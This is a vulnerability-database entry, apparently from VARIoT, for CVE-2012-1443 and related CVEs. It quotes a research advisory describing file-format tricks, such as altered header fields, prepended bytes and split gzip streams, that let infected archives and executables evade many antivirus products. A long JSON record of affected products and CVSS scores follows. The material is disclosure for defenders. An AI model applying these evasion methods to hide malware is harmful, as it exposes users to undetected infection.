    If an infected CAB file's coffFiles field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C, Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402, Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1453

  1. 'ei_version' field in ELF files is parsed incorrectly.
    If an infected ELF file's version field is incremented by 1 it evades detection.

Affected products - McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7

CVE no - CVE-2012-1454

  1. 'vMinor' field in CAB files is parsed incorrectly.
    If an infected CAB file's version field is incremented by 1 it evades detection.

Affected products - NOD32 5795, Rising 22.83.00.03

CVE no - CVE-2012-1455

  1. A specially crafted ZIP file, created by concatenating the contents of a clean TAR archive and a virus-infected ZIP archive, is parsed incorrectly and evades detection.

Affected products - AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004

CVE no - CVE-2012-1456

  1. If the length field in the header of a file with test EICAR virus included into a TAR archive is set to be greater than the archive's total length (1,000,000+original length in our experiments), the antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program.

Affected products - AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, Avast5 5.0.677.0, AVG 10.0.0.1190, BitDefender 7.2, CAT-QuickHeal 11.00, ClamAV 0.96.4, Command 5.2.11.5, Emsisoft 5.1.0.1, eSafe 7.0.17.0, F-Prot 4.6.2.117, GData 21, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, Microsoft 1.6402, NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Rising 22.83.00.03, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2, VirusBuster 13.6.151.0

CVE no - CVE-2012-1457

  1. A Windows Compiled HTML Help (CHM) file is a set of HTML files, scripts, and images compressed using the LZX algorithm. For faster random accesses, the algorithm is reset at intervals instead of compressing the entire file as a single stream. The length of each interval is specified in the LZXC header.

If an infected CHM file's header modified so that the reset interval is lower than in the original file, the antivirus declares the file to be clean. But the Windows CHM viewer hh.exe correctly decompresses the infected content located before the tampered header.

Affected products - ClamAV 0.96.4, Sophos 4.61.0

CVE no - CVE-2012-1458

  1. In a POSIX TAR archive, each member file has a 512-byte header protected by a simple checksum. Every header also contains a file length field, which is used by the extractor to locate the next header in the archive.

If a TAR archive contains two files: the first one is clean, while the second is infected with test EICAR virus - and it is modified such that the length field in the header of the first, clean file to point into the middle of the header of the second, infected file. The antivirus declares the file to be clean but virus gets extracted correctly by the GNU tar program. If an infected tar.gz archive is appended 6 random bytes at the end, the antivirus declares the file to be clean but virus gets extracted by the gunzip+tar programs correctly by ignoring these bytes.

Affected products - Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Command 5.2.11.5, eSafe 7.0.17.0, F-Prot 4.6.2.117, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, VBA32 3.12.14.2

CVE no - CVE-2012-1460

  1. GZIP files can contain multiple compressed streams, which are assembled when the contents are extracted. If an infected .tar.gz file is broken into two streams, the antivirus declares the infected .tar.gz file to be clean while tar+gunzip extract the virus correctly

Affected products - AVG 10.0.0.1190, BitDefender 7.2, Command 5.2.11.5, Emsisoft 5.1.0.1, F-Secure 9.0.16160.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004, VBA32 3.12.14.2

CVE no - CVE-2012-1461

  1. If an infected ZIP archive is prepended with 1024 random bytes at the beginning, the antivirus declares the file to be clean but virus gets extracted by the unzip program correctly by skipping these bytes

Affected products - AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, Kaspersky 7.0.0.125, Norman 6.06.12, Sophos 4.61.0, Symantec 20101.3.0.103

CVE no - CVE-2012-1462

  1. In most ELF files, the 5th byte of the header indicates endianness: 01 for little-endian, 02 for bigendian. Linux kernel, however, does not check this field before loading an ELF file. If an infected ELF file's 5-th byte is set to 02, the antivirus declares the file to be clean but the ELF file gets executed correctly.

Affected products - AhnLab-V3 2011.01.18.00, BitDefender 7.2, CAT-QuickHeal 11.00, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee 5.400.0.1158, Norman 6.06.12, nProtect 2011-01-17.01, Panda 10.0.2.7

CVE no - CVE-2012-1463

Credits

Vulnerabilities found and advisory written by Suman Jana and Vitaly Shmatikov.

References

"Abusing File Processing in Malware Detectors for Fun and Profit" by Suman Jana and Vitaly Shmatikov To appear in IEEE Symposium on Security and Privacy 2012 http://www.ieee-security.org/TC/SP2012/

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0367",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "antivirus",
            scope: "eq",
            trust: 2.1,
            vendor: "comodo",
            version: "7424",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 1.8,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "esafe",
            scope: "eq",
            trust: 1.8,
            vendor: "aladdin",
            version: "7.0.17.0",
         },
         {
            model: "f-secure anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "sophos",
            version: "4.61.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "fortinet",
            version: "4.2.254.0",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1.8,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1.6,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 1,
            vendor: "ahnlab",
            version: "2011.01.18.00",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "panda antivirus",
            scope: "eq",
            trust: 1,
            vendor: "pandasecurity",
            version: "10.0.2.7",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "nprotect",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "panda security",
            version: "10.0.2.7",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "v3 internet security",
            scope: "eq",
            trust: 0.8,
            vendor: "unlab",
            version: "2011.01.18.00",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "sophos",
            version: "4.61",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "10.0.27",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "nprotect",
            scope: "eq",
            trust: 0.3,
            vendor: "inca",
            version: "2011-01-17.01",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "fortinet",
            version: "4.2.2540",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "f secure",
            version: "9.0.16160.0",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "esafe",
            version: "7.0.170",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
         {
            model: "engine",
            scope: "eq",
            trust: 0.3,
            vendor: "ahnlab",
            version: "v32011.01.18.00",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52612",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52612",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1443",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1443",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54724",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1443",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-407",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54724",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54724",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001895",
         },
         {
            db: "NVD",
            id: "CVE-2012-1443",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-407",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware 